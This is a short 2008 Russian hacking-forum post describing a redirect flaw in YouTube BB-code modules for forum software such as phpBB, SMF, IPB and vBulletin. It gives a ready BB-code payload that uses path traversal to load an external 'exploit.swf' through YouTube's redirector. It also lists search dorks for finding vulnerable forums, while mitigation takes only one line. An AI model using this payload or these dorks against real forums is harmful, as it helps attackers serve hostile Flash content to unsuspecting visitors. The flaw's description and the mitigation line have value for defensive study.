Vulnerability Youtube [BB Code]

Discussion in 'Уязвимости' started by ettee, 24 Apr 2008.

Thread Status:
Not open for further replies.
  1. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    В составляющей части существующих модулей отсутствует проверка домена, что дает для атакующего возможность редиректа с помощью getURL.

    PHP:
    youtube.com/v/[param_here]

    $txt['youtube'] = 'YouTube';
    Пример:
    [youtube]../redirection?page=http://exploit.swf/[/youtube]

    Получение активного редиректа:
    PHP:
    http://www.youtube.com/v/../redirection?page=http://exploit.swf/
    Присутствие модуля:
    IPB
    SMF
    phpBB
    vBulletin
    etc

    Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение.

    dork:
    BB Code : [yt] [/yt] /forum/
    BB Code : [youtube] [/youtube] /forum/
     
    _________________________
    5 people like this.
Loading...
Thread Status:
Not open for further replies.